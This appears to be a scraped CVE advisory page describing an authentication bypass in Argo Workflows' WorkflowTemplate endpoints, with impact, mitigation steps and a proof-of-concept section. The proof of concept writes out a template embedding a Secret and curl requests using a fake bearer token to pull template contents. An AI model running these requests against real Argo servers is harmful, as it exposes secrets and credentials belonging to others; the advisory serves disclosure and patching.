Argo Workflows, Authentication Bypass, CVE-2025-XXXXX (Critical)

Listen to this Post

The vulnerability exists in the Argo Workflows server endpoints for WorkflowTemplates and ClusterWorkflowTemplates. The server lacks proper authorization checks on these endpoints, allowing any client with any Authorization header—even a completely invalid token like “Bearer nothing”—to retrieve template contents. The vulnerable code resides in the server’s template handlers where the informers use the server’s service account privileges to read from Kubernetes . When a request hits `/api/v1/workflow-templates/{namespace}/{name}` or the cluster-wide equivalent, the server fails to validate the token’s validity or the user’s permissions before serving the response. Since the informers run with the server’s elevated privileges (rest config using the service account), they can read all templates regardless of the requester’s identity. This creates a complete authentication bypass where template data flows from the Kubernetes API through the Argo server to any unauthenticated client that can reach the Argo server endpoint .

DailyCVE Form:

Platform: Argo Workflows
Version: v3.x (unpatched)
Vulnerability: Authentication Bypass
Severity: Critical
date: 14 Oct 2025

Prediction: mid-Nov 2025

What Undercode Say:

Analytics

The vulnerability affects all Argo Workflows deployments where the Argo Server is exposed to networks accessible by potential attackers. The root cause is missing token validation in the template retrieval handlers combined with informers that use server service account privileges. Attackers can enumerate template names and extract sensitive embedded content including Secrets, artifact repository credentials, environment variables, and service account configurations .

Exploit:

Create a malicious workflow template with embedded secret
cat > poc-template.yaml << 'EOF'
apiVersion: argoproj.io/v1alpha1
kind: WorkflowTemplate
metadata:
name: leak-workflow-template
namespace: argo
spec:
templates:
- name: make-secret
resource:
action: create
manifest: |
apiVersion: v1
kind: Secret
metadata:
name: leaked-secret
type: Opaque
data:
password: c3VwZXJzZWNyZXQ=
EOF
Apply the template
kubectl apply -f poc-template.yaml
Exploit the authentication bypass
curl -sk -H "Authorization: Bearer nothing" \
"https://argo-server:2746/api/v1/workflow-templates/argo/leak-workflow-template" | jq .
For cluster-wide templates
curl -sk -H "Authorization: Bearer invalid" \
"https://argo-server:2746/api/v1/cluster-workflow-templates/leak-cluster-template"

Protection from this CVE

  1. Upgrade to patched version (3.6.12 or 3.7.3) immediately
  2. Implement network policies to restrict access to Argo Server endpoints

3. Use mutual TLS (mTLS) for service-to-service authentication

  1. Deploy API gateway with proper authentication before Argo Server
  2. Audit template contents for embedded secrets; migrate to external secret stores
  3. Monitor logs for requests with invalid tokens accessing template endpoints

Impact

Any unauthenticated attacker with network access to the Argo Server can retrieve all WorkflowTemplates and ClusterWorkflowTemplates, exposing:
– Kubernetes Secret manifests embedded in workflows
– Artifact repository credentials (S3, GCS, etc.)
– Service account tokens and usage patterns
– Environment variables containing sensitive data
– Internal network paths and configurations
– Source code and business logic embedded in workflow definitions

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top